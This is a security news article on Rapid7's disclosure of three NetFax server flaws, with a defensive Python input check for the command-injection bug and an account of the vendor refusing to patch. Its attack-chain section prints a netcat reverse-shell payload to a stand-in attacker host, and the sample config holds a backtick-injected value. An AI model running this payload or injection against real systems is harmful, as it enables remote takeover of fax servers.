
Security researchers at Rapid7 have uncovered a troubling trio of vulnerabilities in MICI Network Co., Ltd.’s NetFax server (versions < 3.0.1.0), allowing for root-level remote code execution (RCE) via an authenticated attack chain. In a discouraging turn, the vendor has refused to patch the flaws, advising users instead to avoid internet exposure.
- CVE-2025-48045 – Default Credential Disclosure (CVSS 6.6 – Moderate)
The NetFax server responds to a GET request to /client.php by exposing default administrative credentials in cleartext, a flaw stemming from compatibility with the ‘OneIn’ client. No authentication is needed to obtain these credentials.
“The display of these credentials appeared to be present due to implemented functionality for support of the ‘OneIn’ client,” the disclosure explains.
- CVE-2025-48046 – Stored Password Disclosure (CVSS 5.3 – Moderate)
Though the UI masks SMTP passwords, the actual configuration file (/config.php) leaks them in plaintext. “The configuration file… provided the cleartext password to the user” despite UI redactions.
- CVE-2025-48047 – OS Command Injection via Misconfigured Fields (CVSS 9.4 – Critical)
By inserting backtick-enclosed system commands into parameters like ETHNAMESERVER, attackers can inject arbitrary commands. This leads to full RCE via /test.php, which executes ping and other commands based on unsanitized input.
“The ‘`’ characters had not been sanitized. This led to remote code execution via command injection,” the disclosure warns.
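The input check whose absence CVE-2025-48047 describes, as an added example (not NetFax or Rapid7 code, and in Python rather than the product's PHP): the nameserver value is accepted only as an IP literal and is passed to ping as a separate argument instead of through a shell. The function names, the `EXAMPLE_FIELD` key and the KEY=value config layout are assumptions made for illustration.

```python
import ipaddress
import re

# Characters a POSIX shell uses for command substitution, chaining or redirection.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\n]")


def parse_nameserver(value):
    """Return a normalised IP address string, or raise ValueError."""
    value = value.strip()
    if SHELL_META.search(value):
        raise ValueError("shell metacharacter in nameserver field")
    # ip_address() rejects anything that is not an IPv4/IPv6 literal.
    return str(ipaddress.ip_address(value))


def ping_argv(value, count=1):
    """Build an argument vector for subprocess.run(argv, shell=False).

    No shell parses the value, so backticks would never be expanded
    even if validation were bypassed.
    """
    return ["ping", "-c", str(count), parse_nameserver(value)]


def audit_config(text):
    """Return (key, value) pairs whose value contains shell metacharacters.

    Assumes one KEY=value pair per line (an assumption for this example).
    """
    findings = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and SHELL_META.search(value):
            findings.append((key.strip(), value.strip()))
    return findings


# Constructed sample input, not taken from a real NetFax system.
# ETHNAMESERVER is named in the disclosure; EXAMPLE_FIELD is hypothetical.
SAMPLE_CONFIG = "ETHNAMESERVER=`id`\nEXAMPLE_FIELD=192.0.2.1\n"

if __name__ == "__main__":
    print(ping_argv("192.0.2.53"))
    print(audit_config(SAMPLE_CONFIG))
```

Since the vendor will not ship a fix, a check like `audit_config` is the part an operator can apply to stored settings when reviewing an existing deployment.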
The attack chain is below:
- The attacker first obtains credentials via client.php.
- Injects a payload like `mkfifo /tmp/x; nc attacker.com 4444 0</tmp/x | /bin/sh >/tmp/x 2>&1;` into the config.
- Executes the injected command by triggering /test.php.
“A reverse shell was obtained through these methods after the existence of the ‘mkfifo’ and ‘nc’ binaries were confirmed,” the report states.
A Metasploit module is already in development and will support both authenticated and unauthenticated exploitation using default credentials.
NetFax is a network fax solution developed in Taiwan, designed to route fax messages through email. While only 34 internet-exposed systems were discovered, the actual footprint is believed to be significantly larger in internal enterprise environments, especially across Asia and the Middle East.
Rapid7 also identified other systems running the same wfaxd architecture, including CoFax Server instances in Iran, though they did not appear vulnerable from passive analysis.
Rapid7 attempted multiple times to contact MICI with no response. TWCERT ultimately mediated, only to receive a stark statement:
“…they (MICI) have responded that they will not address the vulnerability in this product… They stated that they will no longer respond to inquiries regarding this product.”
Rather than fix the issues, MICI advised customers not to expose NetFax to external networks.
However, as Rapid7 notes:
“These vulnerabilities could also be exploited from an internal network perspective… resulting in administrative access to the underlying server.”